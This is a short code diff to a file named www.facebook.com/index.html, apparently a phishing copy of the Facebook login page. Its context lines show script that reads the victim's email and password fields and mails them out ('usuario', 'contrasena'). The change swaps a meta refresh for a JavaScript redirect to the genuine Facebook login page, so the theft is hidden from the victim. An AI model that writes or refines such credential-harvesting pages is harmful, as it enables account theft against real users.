--- a/www.facebook.com/index.html
+++ b/www.facebook.com/index.html
@@ -13,8 +13,7 @@ Email.send({
     Body : "usuario: " + document.getElementById("email").value + ", contrasena: " + document.getElementById("pass").value
 })
 
-<meta http-equiv="refresh"
-   content="0; url=https://www.facebook.com/login/device-based/regular/login/?login_attempt=1&lwv=110">
+window.location = "https://www.facebook.com/login/device-based/regular/login/?login_attempt=1&lwv=110";
 }
 </script>
 <script>function envFlush(a) {
